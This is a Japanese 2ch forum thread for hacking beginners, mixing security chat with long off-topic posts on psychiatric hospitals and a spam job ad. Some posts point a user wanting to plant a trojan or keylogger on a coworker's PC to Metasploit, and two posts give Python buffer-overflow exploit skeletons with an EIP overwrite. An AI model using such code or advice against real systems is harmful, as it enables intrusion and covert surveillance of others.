ハッキングを学びたい part3 [転載禁止]©2ch.net

[0001 anonymous＠hosted-by.2ch.ne.jp Merry christmas©2ch.net 2015/09/04(金) 14:19:17.96 ID:???]

Part1
http://toro.2ch.net/test/read.cgi/hack/1361982070/
Part2
http://peace.2ch.net/test/read.cgi/hack/1409353150/

初心者がプログラムやらセキュリティやらを教えてもらうスレ

[0352 法律板相談スレから来ました。 2016/01/16(土) 03:42:03.83 ID:6h8kYUO8]

LAN 内で、他のPCのIPアドレスを知るソフトはありますよね？

IPアドレスがわかったら、そのPCにトロイのようなウィルスを送る事も出来ますか？
送るというか、ポートが開いているいるところがあれば侵入？

同じ会社なので、本人のPCにキーロガーのようなものを仕込む事もそのPCに触れるなら出来ますよね？

前にも本人に、社内SEやネットワーク管理者に相談したのか、調査してもらったか聞いたのですが
一般的にこういうことがあれば、社内調査もして、社内のシステム担当にも調査の話はありますよね？
本人は探偵に調査依頼してダメだったと書いていますが、前は出てなかった話です。

こうやって書いてみると、疑問点が多いですね

[0353 AHO ◆FIIZ8SXQfS.Z 2016/01/16(土) 11:43:32.27 ID:FYPNSVd6]

>>351
metasploitというピッタリのツールがあるやんけ

トロイの送付まで自動でやってくれるよ

[0354 法律板相談スレから来ました。 2016/01/16(土) 16:50:08.20 ID:dMwXMchU]

>>353
ありがとうございます。
それを書籍で書証にするか、SEかLAN技術者のような専門的知識持った人に、証言してもらうよう
伝えて来ます。

[0355 _ 2016/01/16(土) 20:54:01.53 ID:+BIraqQs]

>>354
Metasploitはそんなに知識がなくても、やり方覚えれば誰でも出来るからな
つべにも海外のひとらが動画あげてるぞ

[0356 _ 2016/01/17(日) 00:22:08.89 ID:???]

>>355
でも、ルーター挟めば大丈夫なんですよね？

[0357 _ 2016/01/17(日) 07:39:05.21 ID:yLk3Sr++]

>>356
MetasploitはLAN内でもグローバルでもできるぞ
Metasploitを簡単にしたArmitageとかいうのもあるし

[0358 AHO ◆FIIZ8SXQfS.Z 2016/01/17(日) 09:29:36.66 ID:0RQ70PRi]

こういうの見てると、政府という存在事はて敵に思えるわ。怪しい中国製品はよく買ってるが。
http://logmi.jp/46036

[0359 AHO ◆FIIZ8SXQfS.Z 2016/01/17(日) 09:37:51.41 ID:0RQ70PRi]

こういうの見てると、政府という存在は全て敵に思えるわ。怪しい中国製品はよく買ってるが。
http://logmi.jp/46036

自分が日本を嫌いなのは、俺の叔母が精神病院に10年以上投獄されているのに放置されているから。
昔から身内の結婚に響くとか、収入がないとかで家庭内で喧嘩だらけだった。

俺まで子供のころからキチガイの遺伝扱いされ、おなじみの下らない学校イジメと不適応。その後働かずブラブラしてたら、精神病院に送られて薬漬けに → 脱出
→薬の離脱症状でのたうち回り、廃人に
→何年もかけて回復したが、アラサーになってしまった

俺がこうやっている間、叔母は強制入院で精神病院に拉致されたまま10年以上放置されている。

[0360 _ 2016/01/17(日) 13:23:58.55 ID:yLk3Sr++]

>>359
乙、いろいろ大変だったんだな

PC、セキュリティに興味もったのはなんのきっかけで?

[0361 _ 2016/01/17(日) 15:17:02.95 ID:???]

>>359
弁護士に相談はしてないの？
被害をネットで書くとそういう事実を知ってる人以外は、キチガイ扱いしてくるけど、本当は知っていて叩いているか工作員ではないかと
被害と被害妄想の区別が付きにくいとは言うものの、老人施設でも虐待はある。そういう施設に関しては、虐待はあるものと思えと考え、無くすように対処しようという
方針を公的機関が文章化している。

もしかして、この板でW合病院の事をネームに入れて書いているのはあなたでしょうか？

[0362 _ 2016/01/17(日) 15:25:54.52 ID:???]

どこまで行き届いているかは、わからないけど、都道府県単位で精神病院の処遇改善に取り組む機関は作っている
このリンクでは、リンク切れだけど大阪弁護士会ははっきり精神病院は人権侵害の温床とまで言っている
http://note.chiebukuro.yahoo.co.jp/detail/n323198
精神科に強制入院させられた友人を救う方法 精神病院処遇改善や人権救済機関

処遇改善だけでなく、入退院措置も相談に乗れるはず
叔母さんは、今の状態で外に出ても、自分で生活していけないだろうから社会的入院というのになっている可能性が高いと思う。
長期入院は取り締まる方向に動いてるはずだけど、W病院はスレでも不思議がられていた。
10年以上叔母が・・・という話はそのスレ見た事がある。

[0363 _ 2016/01/17(日) 15:36:39.23 ID:???]

http://archive.is/UJlOZ
大阪弁護士会のは、これです。
はっきり書いてます。

> 精神保健支援業務 　　高齢者・障害者総合支援

>精神保健支援業務の意義と目的
>ーなぜ弁護士がこのような活動を行っているのかー

>精神障害者ないし精神病というものに対しては、一般には得体の知れないもの、恐いものといった無知・無理解があります。そこから、精神障害を持つ人に対しては精神病院等の施設に入院
>（強制入院が中心）させ、社会から隔離するという発想が長らく続き、また、施設内においても通常の医療というイメージからかけ離れた患者処遇が常態化し、人権侵害の温床となってきました。

>近年、精神保健福祉法に基づき、都道府県知事への退院請求や処遇改善請求等の救済制度が一応整えられてきています。しかし、患者自身に その制度の存在が十分に知らされていないことや
>入院中の患者の代理人として法的援助を行う制度が存在していないことから、この申立制度 は申立件数も少なく、患者救済のために十分機能しているとは言いがたい現状です。 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322)

[0364 _ 2016/01/17(日) 15:59:47.71 ID:???]

でも、「 精神科に強制入院させられた友人を救う方法 精神病院処遇改善や人権救済機関 」にも書いたように
大阪精神医療人権センターというところは、この書き込みだけで、コメント欄無くしさえしました。
http://archive.is/r2Zca
電話一本名古屋の保健所や精神保健センターにしようとしなかった。電話でそちらではどうしているか聞いたら、入院させられていた病院とは別の系列の公立の病院に診察してもらって
入院が必要ではないという所見を取ったり、書いてもらったりしているなどと言っていた電話の録音もバッチリある。その後瀬戸市にいた時にも電話したら
居丈高に「もう、相談に乗れません！」と言い放たれている録音も。こっちは何一つその相談者の人格を否定するような事は言ってません。だって録音してるんだから。。。

それ以外にも私よりよっぽど過激で、自分が入院した久里浜の病院のブログを作って
薬も飲みまくっているアルコール依存症で看護師という男性もコメント欄全消しに・・・
本人がちょうど見てない時に最初書き込んだら、見てなかったので、だったか、見ていれば、みたいな返事があったので再度書いたらそうなりました
これも知恵ノートには魚拓で載せてます

まあこういう現状ですが、弁護士ドットコムでは西田先生が、こうおっしゃっています。
続く 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322)

[0365 _ 2016/01/17(日) 16:16:49.34 ID:???]

http://www.bengo4.com/sozoku/b_412134/
裁判の本にも出ている精神病院

図書館で、日本の裁判についてこれでいいのかと問う本を借りたら、精神病院のU病院という院長が逮捕された病院の話が 載ってました。
有名な朝日新聞のルポ以外の本で、アメリカで画家として個展も開いていたこともある人で日本でも東京で美術関係の仕事を していた人の本も載ってま した。
ネットでは問題提起すると、タブー視されたり、叩き対象になる話題ですが、図書館では精神病院告発関係の本がある棚では なく、司法や法律関係の本の棚に置 いてある本にも普通に載せられていることに驚きました。
各地の単位弁護士会というその地域の弁護士会でも、精神医療に関する人権問題への取り組みがHPに載っています。 当番制 度を作っている弁護士会もあ ります。
こういう状況を見ると、弁護士の方にとっては、精神病院の人権侵害というのは、
ありふれた事という感覚なのでしょうか？
または、あってもおかしくない事と捉えておられるのでしょうか？
しかし、実際相談に来られても困ってしまうのではないかと思いますが・・・

http://archive.is/ecMUB
これは削除にされないために、短文お礼しか書かなかったけど、疑問は山のようにあるが・・・
もし本人のところに相談に行ったらどうなるのか など こっちが東京だと知ってるから来ないと思って書いているのかなど
それにそういう意味ではなくて、本当に実名での回答の勇気に感動したんだけど 実名での回答の勇気に感謝しますなど書いたら、嫌味か皮肉か、下手すると脅しに思われるのではないかと思ったりしたので
(別アカか何かで削除にされたのに東京にいると書いていた) 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322)

[0366 _ 2016/01/17(日) 16:46:38.88 ID:???]

スレチごめんなさい。

精/神/病/院を巡る利/権/構/造は、こうなってます。
http://note.chiebukuro.yahoo.co.jp/detail/n312528
精/神/医/療/問/題/点の指/摘

社/会/的/入/院の人も他に引き取ってくれる病/院があれば、時東さんのようにもなれるはず
http://note.chiebukuro.yahoo.co.jp/detail/n314133
双/葉(ふたば)病/院の謎

精/神/医/療/問/題/点の指/摘　http://note.chiebukuro.yahoo.co.jp/detail/n312528　に載せたくろねこの散歩道のブログの人は、精神医療の構造的批判もしつつ、
精/神/科/医に知り合いもいて(べてるの家で町起こししているような)、結構良い位置に居る
ネット上の協/力だけで良いので、協/力してくれるように頼んでみませんか？一緒に。

ネット上の協/力とは、リンクや拡/散/協/力などの事です。

[0367 日本人 2016/01/17(日) 17:10:53.22 ID:???]

>>350
1点だけ大きな致命的問題を感じたので聞かせていただければ幸いなのですが
日本が嫌いなのはなぜでしょうか？

あと真剣な場合こちらから連絡させていただきます。念の為連絡用のステアドはお持ちですか？
無いならばこちらで用意します。

[0368 _ 2016/01/17(日) 20:39:25.49 ID:???]

>>367
>>350じゃないけど、>>347の設問(質問ではなく設問ですよね？)は、答えられないものもあると思います。
嫌いな国と言っても、国単位で決められない問題では？
そこに実際に住んでいる市井の人と首脳部では全然違うとか
例えば北朝鮮首脳部を好きという人は日本ではいないでしょうけど、北朝鮮の国民は被害者のようなものです。
そこまでのではなくても、個人としての国民性と国としての姿勢とかに対する受け取り方や思いの違いもありますよね？
その国の文化は嫌いじゃないけど、その国の政府は嫌いとか
なぜ文化は好きかというと、政府批判的なものがあったからだったみたいな(例として出しただけで自分がではありません)。
批判もしつつ、批判に潰されない黒人文化はやっぱり良いと思いますが、あまりに尖鋭的批判は怖いと自分は感じます。

さっき書きかけて消えてしまったのですが
こういうのではないですよね？
http://archive.is/yHM3c　今はジモティーから消えていたので、キャッシュの保存
お金を貯めたい方、必見！！　

南相馬市でのPC作業です。。。 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322)

[0369 _ 2016/01/17(日) 20:47:35.91 ID:???]

>>367
>>359に書いてある事では？

こういうところで求人募集って・・・
福島じゃなくても、アノニマス的なものとか？

アノニマスは、こうだった・・・
左翼デモにかり出される要員みたいw

あなたのために働きます。アノニマス - Togetterまとめ
http://togetter.com/li/680414
＋マニアン @Tasmanian_good 2014-06-15 05:49:39. 共産党と戦うと、アノニマス とも戦う事になるんだ！！ アノニマ スはよく、我々は複数だーーーとか言って、脅しの ように恐怖で人を支配しようとする人がするような事を書きますよね あれが似てるなあと 思っ ...

アノニマスについての検索結果保存 資料としてブクマなど - Togetterまとめ
http://togetter.com/li/679204
2014年6月12日 ... Tasmanian_good 864 view 9 コメント ... “CNN.co.jp : ハッカー集団「アノニマス」、米 司法省サイト を乗っ取り 脅迫文も” htn.to/njc8GjyocGF ... あとでみる 資料 ブクマ / “ 日本アノニマス 若年層 - Google Search” ln.is/htn.to/4LZkW.

[0370 AHO ◆FIIZ8SXQfS.Z 2016/01/18(月) 08:25:33.74 ID:a8UDZ8g2]

>>360
昔からPCが心の友でしてな。PCは小学校の時に買ってもらったのが最初。だがネット環境はなくて、結局ゲーム機と化した。

その他の経緯は
http://peace.2ch.net/test/read.cgi/hack/1409353150/910

>>361
このスレで詳しいことは言えませんが、ありがとうございます。
もの凄く、精神病院の問題に詳しい方のようですね。
叔母の件は、事件化に向けて頑張っています。

[0371 AHO ◆FIIZ8SXQfS.Z 2016/01/18(月) 08:38:53.59 ID:a8UDZ8g2]

>>367
連絡先はこちらです。
donate_aho＠yahoo.co.jp

日本が嫌いなのは>>359という個人的な事情があるからです。投薬治療の影響なのか、軽いジスキネジアになりましたが補償は受けてません。日本は精神薬の有害作用を認めさせるのが非常に難しいらしい。
おかげでスポーツの夢は潰えました。

残念ながらバッキングやプログラミングのレベルはキディレベルです。eスポーツで遊ぶのが趣味というか。

これから先、自分が満足出来そうな分野はコンピュータしかないと思っています。

[0372 AHO ◆FIIZ8SXQfS.Z 2016/01/18(月) 08:54:14.33 ID:a8UDZ8g2]

>>371
訂正：バッキングじゃなくてハッキングでした。

>>361-366
弁護士には相談しましたよ。裁判にしても「まず勝てません」とのこと。

そりゃそうですよ。病院の過剰投薬で死亡した事件も裁判で負けてましたから。

しかし、過去に伊藤病院不当入院事件というのがありまして、この件は本人による民事訴訟で勝てています。
yabusaka.moo.jp/seisinbyouin.htm

叔母の入院は、この伊藤病院事件の状況に酷似しているんですよ。ただ本人が廃人みたいになってまして、訴訟能力があるかどうか。

[0373 _ 2016/01/18(月) 18:39:34.47 ID:???]

>>372
裁判じゃなくて処遇改善や、転院についてですよ。
弁護士にというより、そういう改善に取り組んでいる部所？というか
都道府県単位で、公的機関としてあるものと、弁護士会が設けているものとあります。
弁護士は弁護士ドットコム内でも、意見が分かれたり間違っている事を回答していることもあります。弁護士自身がそう書いています。
人権を標榜している大阪精神医療人権センターも弁護士主動の団体ですが、前述のように酷かったのですが
まだまだ他に方法はあります。
最近には弁護士も、こう書いてますし　>>365
365に載せた　弁護士ドットコムの　弁護士回答↓
> こういう状況を見ると、弁護士の方にとっては、精神病院の人権侵害というのは、ありふれた事という感覚なのでしょう か？
かなり存在している感覚です。

> しかし、実際相談に来られても困ってしまうのではないかと思いますが・・・
弁護士会も積極的に取り組もうとしています。

> 訴訟以外で、依頼を受ける事は出来るのでしょうか？例えば再入院を防ぐとか
当然依頼を受けることがあります。 > > 無いとか回答してた他質問への答で見た事もありますが、弁護士会の精神病院に関する相談は使える地域は無いのでしょうか？
ある地域の精神病院内の待遇改善の電話相談では、精神病院内からの相談しか受け付けてないと、事務員の人の責任 者のような人に言われました。
通常はそのような相談も受け付けていることが多いと思います。

[0374 _ 2016/01/18(月) 19:01:44.32 ID:???]

>>372
そうですか。。。
色々あるんですね。。。

あのぉ、KSという弁護士については、やり過ぎだと思うので、関わらない方がよろしいのでは？
弁護士に問題があったとしても、その解決策として妥当な方法とも思えませんし、もはや集団心理で捌け口のように攻撃やからかいをされているだけでは？
他にもっと問題なことはあるし、問題な弁護士はいると思いますが。

返信ありがとうございました。


私は詳しいというより、自分自身逃げている状態で、親に見つかったら何をされるかわからない立場だから、調べなくてはいけなくて調べただけです。
名古屋の区役所で、実質虐待証明になるマイナンバーの住所登録地以外の住所への送付という支援措置や、住民票の閲覧制限(そこでかけてあまり意味はないけどもし移す場合
他自治体で、閲覧制限かけやすいかもという配慮から)は、できましたが、これは他自治体に行くからやってくれただけのことで実際にはもっとサポートすべきなのにおかしいと思っています。
ずっと前の事はともかく、数年前の事は物凄く証拠もあったので(一部youtubeにアップしている録音も)

[0375 _ 2016/01/18(月) 19:09:49.86 ID:???]

親は教師で、三重県で管理職でした。退職後は教育委員会
母親は養護教諭でした。

それでこんなにキチガイじみたことをされました。
http://sky.geocities.jp/oooquree/fax.html
精神病院の事も書いてあるのはこっち↓
http://sky.geocities.jp/nanami061106/
親からの異様なFAXの書き下し文↓
http://sky.geocities.jp/nanami061106/oyanokimotiwarui. fax.html

[0376 _ 2016/01/18(月) 19:42:33.01 ID:???]

追記
KS氏より、できればこういうのを告発や拡散お願いしたいです。

共/産/党(アップしている録音ではマスキング)が、そんな事言うわけない！と京/都の借/地借/家人/組/合に言われてます
http://www.youtube.com/watch?v=GfbqZ2ZzDQw
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q13152932868　拡散【 左翼系弁護士たちの怖さを知った人私以外にも居ますか?】希望
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11152175456　違法に建物を壊されるような立退きに遭った人いますか？

弁護士ドットコムでは、消されました。
http://archive.today/aDeuz　ある正義の味方の政党系弁護士にされたモラハラ

ある大手企業を訴えた女弁護士ですが、その企業とはト○タです。 👀
Rock54: Caution(BBR-MD5:a3781ace2e9924b3cc1824cf6f803ee4)

[0377 名無し 2016/01/19(火) 09:03:20.60 ID:LsUGJyKJ]

>>345
プログラマとして働いている、趣味はctf
どんな感じなのですか？興味があります。

[0378 名無し 2016/01/19(火) 09:07:54.41 ID:LsUGJyKJ]

>>347
主にセキュリティの専門知識と技術向上が目的になりますか？
人間の人生について次の内だと何が一番大切に思いますか？
2、自己開発

人類について次の内だと何が一番大切に思いますか？
1、知恵

嫌いな国を3つあげるなら順位的にどうなりますか？
1日本　2アメリカ　3北朝鮮

お手数をかけます。

[0379 _ 2016/01/19(火) 20:47:55.55 ID:DButuy2F]

おいおい、こんなにインチキくさいやつに教わるとか勘弁してくれ。第一、そいつがどれだけ知識があるかわからないのに、馬鹿じゃねーのw

[0380 ナ 2016/01/19(火) 22:21:44.28 ID:UGRN1/ek]

日本嫌いな人多いのか？

[0381 すーぱーはかー 2016/01/21(木) 14:19:11.29 ID:???]

>>347とかどう見ても自分に酔ってるだけのアホだろ
何で真面目に答えてる奴が居るんだよｗｗｗｗｗｗ
簡単なレベルなら教えてやんよ
まずソケットプログラム作れ、今回はpythonで書く

#!/usr/bin/python
#
import socket

exploit = b"A" * 1000
payload = b"\x00\x00"
sploit = exploit + payload

printf(sploit)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 10000)) #IP,ポート
s.send(sploit)
s.close()

ま、これが簡単なソケットプログラムな
windowsでollydbgやimmunity debuggerで脆弱性のある鯖を起動する
上のソケットプログラムのIPとポートを変えてAを1000個などの大量のパケットを送信する
ollydbgやimmunity debuggerの方にあるregistersのEIPって所を見ると41414141とかになったりすることがある
EIPの41414141は翻訳すると"AAAA"ってことなんだよ、もちろん"A"の部分を"B"にすればEIPは42424242ってなって翻訳すると"BBBB"ってことになる
つまりregistersのEIPに送信したパケットが入ればいい、これがよく言われるバッファオーバーフローって現象
あとはmetasploitとかを使ってpayloadを作成して"\x00\x00"って所に貼り付けて"A"の個数をEIPまで調節すれば任意のコードが動く
自動化するツールもあるけれど殆どのハッカーはこういう感じで脆弱性を探してるんだよ

[0382 名無し 2016/01/21(木) 18:14:18.04 ID:wE1ONfZj]

>>381
脆弱性のある鯖だったらvm playerとかじゃないの？
ollydbgはデバッガだけど…

[0383 名無し 2016/01/21(木) 18:17:56.04 ID:wE1ONfZj]

>>345
知識とかはどうでもいいから、仕事持ってないかな

[0384 名無し 2016/01/21(木) 18:25:52.74 ID:wE1ONfZj]

>>382は鯖を起動するならvm playerとかで仮想環境で起動するんじゃないの？ということね

[0385 _ 2016/01/21(木) 19:41:08.99 ID:???]

>>381
ガチでワロチｗｗｗ

[0386 すーぱーはかー 2016/01/21(木) 22:23:02.56 ID:???]

>>384
確かにOS起動しなくなったりすることもあるから仮想環境で実行した方が安全ではある
言葉が足りなかったかもしれんから書いとくがデバッガーを起動してデバッガーで鯖ソフトを逆アセンブルにかけてエミュレート実行ってことな
仮想OS上でデバッガーを使ってエミュレートするってのでも問題無い

ローカルの権限昇格も似たように
C:\windows\system32>sample.exe "AAAAAA"
とか引数入力してEIPが41414141になるかとかを調べりゃいいだよ

基本としてはESPからEBPまでがスタックの範囲だからJMP ESPを探してアドレスを憶えとく（search for->CommandsとかにJMP ESPとか入れて検索
EIPにJMP ESPのアドレスを入力する
>>381に付け加えるとするなら

#!/usr/bin/python
#
import socket

junk = b"A" * 1000 #EIPまで適当なデータを入力
eip = b"\x67\x45\x23\x01" #JMP ESP命令のアドレスが01234567だった場合
payload = b"\x00\x00" #実行命令本体
sploit = junk + eip +payload

printf(sploit)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 10000)) #IP,ポート
s.send(sploit)
s.close()

まぁ、こんなの調べればどこにでも書いてることだがな

[0387 -_-; 2016/01/22(金) 15:16:40.50 ID:???]

>>381
exploit = b

[0388 名無し 2016/01/26(火) 04:07:04.79 ID:Xu8POCcl]

>>386
ファジング的なやり方って効率イイの？
オーバーフローしたらラッキーってやり方は効率が悪いと思うんだけど
デバッガでちまちま解析したほうがいいと思うんだ
そもそもコード自体に脆弱性があるかどうかわからないし

[0389 すーぱーはかー 2016/01/27(水) 00:57:15.64 ID:???]

>>388
簡単なレベルの解説だから効率は度外視してる
このレベルの原理ならファザー使った方が早いよ
>>1から読んだけどツールの使い方くらいでデバッガーで解析出来るレベルの人が居ないでしょ・・・
そうなるとスタートラインに立つための足掛かりとなる解説とコードくらいは必要じゃん？
どっちにしても解析しないとコードに脆弱性があるか分からないのは同じだぞ

[0390 あ 2016/01/27(水) 12:45:04.73 ID:Cf5ZRyUB]

このサイト、ハッキングに対してどれぐらい強いの？
http://meganslaw.ca.gov/index.aspx?lang=JAPANESE

[0391 名無し 2016/01/28(木) 00:05:28.02 ID:olD1qnFp]

>>389
なるほどな、確かにツールの使い方ばかりだったな
そういうことかありがとう。>>389は得意分野はバイナリだったりする？

[0392 すーぱーはかー 2016/01/28(木) 01:23:32.20 ID:???]

>>391
解析するのは割と好きだけどプログラム組むとIAT構築とか面倒な部分あるから微妙
普段使うならpython、c、c#、php辺りが妥当でしょ
一番嫌な言語はjavaだな、仕様変更が多い、脆弱性が多い、速度が遅い、の三冠王
androidで使うけど速度遅くてイラつく

[0393 名無し 2016/01/28(木) 03:24:58.53 ID:olD1qnFp]

>>392
やっぱり解析はするんだな、バイナリってのは言語のことではなくて
ネットワーク、web、バイナリ、分野を大まかに分けたことだったんだがctfer以外は
以外には通じないのかな？
普段使うならその選択肢がいいな

[0394 すーぱーはかー 2016/01/28(木) 04:51:09.71 ID:???]

>>393
全部独学だからCTFer以外に通じるかは知らないがバイナリと言えばアセンブラ言語か機械語だな
解析するのは好きだが解析が得意かは別
必要があればパケットもコードも解析するし、XSSとかSQLインジェクションみたいな脆弱性も解析する
ハード面の解析はハード買う金がかかるからやらない

[0395 アフィカス 2016/01/28(木) 19:20:07.34 ID:SkZ++avL]

【社会/ネット】SNSの写真だけで合鍵が作れる――3Dプリンタを使った現実世界の“ハッキング”に注意 [無断転載禁止]･2ch.net
http://d aily.2ch.net/test/read.cgi/newsplus/1453972236/
SNSにあげた写真から、合鍵が作られるかも――カスペルスキーは1月28日、3Dプリンタを使って
合鍵を複製する、現実世界での“ハッキング”に注意する内容のブログを公開した。

3D印刷技術の進化により、金属工芸やプログラミングの技術、物理的な鍵の入手など、これまで
合鍵を作るのに必要だった条件が不要になり、簡単に安価に合鍵を生成できるようになったという。
昨年12月にドイツで行われたカンファレンス「32C3」では、3Dプリンタを利用した鍵の偽造方法に
ついて報告があった。

最も一般的な鍵システムの1つ、ピンタブラー錠は、写真を元に遠隔で3Dプリントすることもできるという。
最近のカメラは解像度が高く、写りの悪い写真でもレプリカを印刷できる恐れがあるとしている。

深い溝のある特殊加工されたバンプキーが必要な「バンピング」という手法を使う際も、金属に比べ
プラスチック製の方が衝撃を伝えやすく、解錠の音や鍵穴を損傷させるリスクも小さく、優れた
選択肢になる。3Dモデル作成と印刷は金属を扱うよりも簡単だ。

3Dプリント技術はマスターキー作成も簡易にしているという。対象となる鍵穴の1つに合う通常の鍵を
持っていれば、溝の1つを変形させ、企業や施設内の複数の鍵穴に共通して使える鍵を作成できる――
ということだ。鍵のサンプルを複数用意して試行錯誤するには3D印刷で量産するのが適している。

同社は対策として、「鍵は実世界におけるパスワード」とサイバーセキュリティと同様に考えることを
提案。「一般的なピンタンブラー錠ではなく、より複雑なロックシステムを選ぶ」（簡単なパスワードは
使わない）、「2段階認証を使う」（違う種類の鍵や認証手段があれば安心）、「パスワードを漏らさない」
（鍵の写真をオンラインに投稿しない）――などを挙げている。

ソース/YAHOO!ニュース（ITmedia）
http://headlines.yahoo.co.jp/hl?a=20160128-00000081-zdn_n-sci

[0396 素人 2016/02/02(火) 03:16:37.56 ID:???]

windowsのコマンドプロンプトやlinuxを仮想マシンで起動してハッキングツールいじってるぐらいの素人ですが、
簡単でなおかつ効果のあるハッキング手法は、ありませんか？
一度でいいからハッキングしてみたいです。

[0397 あ 2016/02/02(火) 07:20:17.19 ID:???]

Metasploitとか、それを簡単にしたArmitageとかがあるぞ。Windows2000くらいがどれだけ危険なのかがわかる
つべで調べたら、やり方沢山乗ってるあと、他人の鯖でやったらお縄になるから必ずVMとかでやれ

[0398 名無し 2016/02/04(木) 10:31:54.45 ID:???]

通報した

[0399 名無しSUN 2016/02/05(金) 08:52:26.32 ID:???]

ハッカーって、ネットワーク系だけじゃないよね。映画とかはよく悪人にされるけど...

[0400 はっかー 2016/02/06(土) 22:35:09.70 ID:???]

ハッカーってどうやって見抜くんですか??
あなたはハッカーですかと聞いた時にはいそうですといったらハッカーなんですか??

[0401 天才ショッカー ◆KjV5V9dJA6Be 2016/02/08(月) 15:37:59.86 ID:2YR3xFqg]

やっほー

[0402 名無し 2016/02/09(火) 14:31:04.65 ID:???]

>>397
あんまし言うなよ

[0403 煙 2016/02/17(水) 18:20:49.92 ID:FRbBB64p]

マルウェアのリポジトリ取得してそのフォルダをTwitterにアップしただけで
書類送検されるらしいぞ！

[0404 煙 2016/02/17(水) 18:21:40.50 ID:FRbBB64p]

怖い時代ですねーとづまりすとこ

[0405 あ 2016/02/17(水) 18:26:16.65 ID:???]

ソースは?
>>403

[0406 名無しさん＠いたづらはいやづら 2016/02/17(水) 23:00:46.99 ID:???]

当方初心者、質問です
ﾜｯﾁｮｲの後についてるIPを書き換えたらしき物からハッキング、クラッキング等される可能性はありますか？

[0407 名無しさん＠いたづらはいやづら 2016/02/17(水) 23:05:04.23 ID:???]

ないです（直球）

[0408 名無しさん＠いたづらはいやづら 2016/02/17(水) 23:09:51.22 ID:???]

ありがとうございます、じゃあ生ＩＰ？からはありますか？

[0409 名無し 2016/02/19(金) 07:30:56.04 ID:???]

生IPからクラッキングされる事は、あるだろうね
まぁ個人をクラッキングなんて悪趣味な奴しかやらん
悪趣味な奴を敵に回してたらしらん

[0410 jack 2016/02/21(日) 09:40:09.11 ID:???]

DOS攻撃されなきゃファイアーウォールでどうにかなるんじゃ？
僕も詳しくは解りません。
ファイアーウォールしててもハッキングなんてされるもんなのかなぁ・・・。

[0411 anonymous 2016/02/21(日) 10:01:55.95 ID:???]

ファイヤーウォールを無敵の鉄壁か何かだと思ってる？
通信するのに穴のない壁など使えるわけないよね？

[0412 jack 2016/02/21(日) 12:41:55.70 ID:???]

>>411
確かにその通りですね。

[0413 名無しだ悪ぃかｸｿﾔﾛｳﾄﾞﾓ 2016/02/21(日) 13:30:10.90 ID:???]

最強のファイヤーウォールはLANケーブルを抜くこと

[0414 バウアー捜査官 2016/02/21(日) 22:56:47.77 ID:???]

サイバーセキュリティプログラミング ―Pythonで学ぶハッカーの思考
https://www.amazon.co.jp/dp/4873117313/ref=cm_sw_r_cp_awd_2fCYwbRVP96TX

サイバーセキュリティ方面のプログラミング言語はPythonをチラホラ聞くけどRubyじゃダメなの？
やっぱJAVA、C、js、Pythonあたりは押さえとくのは常識なんかな？

[0415 名無しさん＠いたづらはいやづら 2016/02/22(月) 02:33:54.94 ID:???]

>>414
何故pythonかと言うとPCの現行OSではデフォルトで入ってるから100%コンパイルが可能
windowsはC#かVBでlinuxはpythonがデフォルトでコンパイラが入ってる
他の言語は常識って訳じゃないけど読める程度には憶えた方がいい
androidならjava、iosならc、web鯖ならsqlとphpが多い
どの環境でも対応出来る言語の方が重要ってことなんだと思う

[0416 バウアー捜査官 2016/02/22(月) 21:55:58.69 ID:1tNrC25j]

>>415
なるほどサンクス
わいMac使ってて少し前にPython3は入れたんだけどまだ触ってない
プログラミング初心者なんだがPythonからでもよかろうか？

[0417 あ 2016/02/23(火) 00:01:23.14 ID:???]

プログラミング初めてならPythonからのほうがいいかも
Python2.xとPython3.xの文法が微妙に違うから注意な

[0418 anonymous 2016/02/23(火) 00:04:18.81 ID:???]

>>411
家庭用ならアウトバウンドだけ許可しているようなFWはいくらでもあるじゃん

[0419 初心者 ◆/8yGReHmDakX 2016/02/23(火) 04:04:18.23 ID:???]

>>409
ありがとうございます

えっと、気づかずになにかされてるかもしれないのですかね？
偶にセキュリティソフトやらマイクロソフト？からされてるような警告が出てた記憶があるんですが？

やる側もプロバ等から回線をつないだ記録は残ってるもんなのですかね？
どの程度かでも残ってればいずれ文明が発展したりして
開示条件次第等で過去に遡って特定出来る時代が来る可能性はありますか？

[0420 名無しさん＠いたづらはいやづら 2016/02/23(火) 04:55:32.59 ID:???]

>>416
全然問題無いぞ
公式のリファレンスとか他言語より初心者向きに書いてるし
>>417の言う通り微妙に違うし、3.xより2.xの方がlinuxでよく使われてるから最初は3.xより2.xの方がおススメ

[0421 名無しさん＠いたづらはいやづら 2016/02/24(水) 17:45:06.98 ID:???]

.
.
板違い（？）の上に、話をさえぎってしまいゴメンナサイ！(*_ _)人
でも、この板のユーザーさんにも有意義な告知かと思うのでカキコませてください。

★ 謝礼は十分いたします ★　アメブロなどのサイト制作ができる方！！　

アメブロなどを使用してのサイト制作のできる方を早急に求めています！
私はリケジョやPC女子からはほど遠く、サイト作成にはまったく疎いのでとても不自由しています…(> <；)
そこで私に代わりサイトを作成してくださる方を求めてこの場をお借りしました。

■サイトの内容…
アダルト系、違法性、その他公序良俗に反するものではありませんのでご安心ください。

■サイト制作の仕様ベース…
アメーバブログで十分です。願わくばwordpressなどのブログ形式のサイトを希望します。
それに準ずるもので使い慣れたものがあれば別のものでも構いません。

■条件はありません…
技術さえお持ちでしたら、学歴・職歴等は一切問いません。
フリーター、ニート、高齢ニート、コミュニケーション障害をお持ちの方、引きこもりの方、中年失業者、長期無職等、歓迎！

■作業形態…
作業は在宅でやって頂くことになりますので、時間の指定は一切ありません。別のお仕事の傍らに…でもOKです。

■詳細をお知りになりたい方は…
下記メールアドレスまでご連絡ください。詳しく書いた返信文を差し上げます。

※真剣な告知です。冷やかしはご遠慮ください。

井 上
inoue1952w★gmail.com
迷惑メール対策のため＠部分を★にしてあります。
実際に送信する際には★を＠マークに変えてください。
.
.

[0422 パイ乙 2016/02/24(水) 22:25:26.40 ID:GJcswKAc]

サクッとNG Nameっと

[0423 こんにちは 2016/02/24(水) 23:06:38.13 ID:ulAZdGbF]

頑張ってください

